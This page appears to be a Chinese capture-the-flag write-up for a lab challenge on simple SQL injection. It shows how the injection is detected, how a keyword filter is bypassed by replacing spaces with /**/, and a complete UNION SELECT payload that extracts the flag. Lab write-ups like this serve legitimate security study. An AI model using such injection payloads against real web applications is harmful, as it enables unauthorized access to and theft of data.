美文网首页
实验吧 简单的sql注入

实验吧 简单的sql注入

作者: theLexical | 来源:发表于2019-03-10 22:13 被阅读0次

题目如下

image.png
  1. 首先简单判断是否存在sql注入
    输入1,显示ID:1,name:baloteli
    输入1',显示You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
    说明存在sql注入漏洞。
  2. 判断过滤掉了什么
    输入1 and 1=1或者union 1=1,回显ID: 1 1=1,说明过滤了and ,union ,这些关键字。主要是通过union+space过滤,而空格可以写成/**/来代替
  3. 构造payload
    显然我们要从一个表中获取flag值,猜测表名和列名都是flag,查询语句应为:
    select flag from flag
    猜测原来的SQL查询语句为:
    "select * from table where id= '$id' " (这个查询只是象征性的表示一下)
    那么构造的payload应该为:
1' union select flag from flag where '1'='1
# 空格换为/**/
1' union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
# 整体来看
"  select * from tables where id= '1' union select flag from flag where '1'='1'   "

最终就爆出了flag的值。


image.png

相关文章

  • 实验吧-简单的sql注入

    实验吧-简单的sql注入 原题链接 http://ctf5.shiyanbar.com/423/web/ 分析 发...

  • 实验吧 简单的sql注入

    题目如下 首先简单判断是否存在sql注入输入1,显示ID:1,name:baloteli输入1',显示You ha...

  • 实验吧CTF简单SQL注入

    简单的SQL注入1,2 知识点: 空格用/**/或者()代替 可以把关键字重复一遍防止字符过滤 获取数据库名:1'...

  • 实验吧--简单的SQL注入一

    一、注入点测试 1、查看源码,发现其提交方式为get。 2、链接后面添加id=1'报错,说明其存在注入点 3、输入...

  • 实验吧 简单的SQL注入2

    题目 同第一个注入相比,没什么界面没什么太大变化,只是过滤的东西变了。 注入判断输入1,返回正常;输入1',会报错...

  • 实验吧 简单的SQL注入3

    首先还是晒一下题目: 判断是否存在注入 我们还是来判断一下是否存在注入,输入1'发现会提示语法错误,说明存在注入。...

  • 实验吧 CTF 简单的sql注入

    以下为原文摘抄: 因为本人在阅读答案时,有很多地方不明白的。在多次阅读之后,决定将原文摘抄下,并在不懂的地方加上笔...

  • 实验吧-简单的sql注入之3

    实验吧-简单的sql注入之3 原题链接 http://ctf5.shiyanbar.com/web/index_3...

  • 实验吧-简单的sql注入之2

    简单的sql注入之2 原题链接 http://ctf5.shiyanbar.com/web/index_2.php...

  • 实验吧WP之简单的sql注入

    其实感觉确实不难,不过一些比较看经验的地方没有把握好,导致一直没有出flag 首先,看到这道题,题目很明确,注入。...

网友评论

      本文标题:实验吧 简单的sql注入

      本文链接:https://www.haomeiwen.com/subject/mstmpqtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|实验吧 简单的sql注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!